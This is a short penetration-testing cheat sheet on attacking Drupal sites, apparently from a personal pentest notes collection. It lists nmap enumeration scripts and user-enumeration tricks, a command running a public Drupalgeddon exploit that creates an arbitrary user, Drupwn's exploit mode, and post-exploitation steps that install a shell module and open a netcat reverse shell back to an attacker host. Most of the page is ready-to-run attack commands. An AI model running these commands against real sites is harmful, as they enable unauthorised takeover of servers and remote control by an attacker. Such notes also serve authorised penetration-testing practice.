Drupal

#NMAP

nmap -p 80 --script http-drupal-enum 10.10.10.10

nmap -p 80 --script http-drupal-enum-users.nse 10.10.10.10

#Misc.

Always check for

/robots.txt /dev /test

In /user/register just try to create a username and if the name is already taken it will be notified (POC for user admin)

Accessing /user/ you can see the number of existing users

/users/1 /users/2 /users/3 returns a not found error

#Drupalgeddon | Drupal 7.0 > 7.31

Syntax:

python /usr/share/exploitdb/exploits/php/webapps/34992.py -u redcliff -p password123 -t http://10.10.10.10

Arbitrarily creates a new user and password ----→ -u redcliff ---→ -p password

#Drupal Shell (Post exploitation)

[1]Once logged in, navigate to modules [2] http://drupal.org/project/shell #url might vary, check out official documentation [3] Download either from url or directly into kali host, then install [4]Open from main page (left side) [5] launch a revshell directly form terminal back to kali host nc -nv 10.10.10.11 4444 -e /bin/bash

#Drupwn

drupwn --mode enum --target http://192.168.101.149:80/

Use with sudo ,user exploit mode ,metasploit-like interface.

sudo drupwn --mode exploit --target http://192.168.101.149:80/ --users

#Droopescan https://github.com/SamJoan/droopescan sudo pip install droopescan sudo droopescan scan drupal -u 10.11.1.50

PreviousMoveStore API Auth bypass NextKoken CMS

Last updated 2 years ago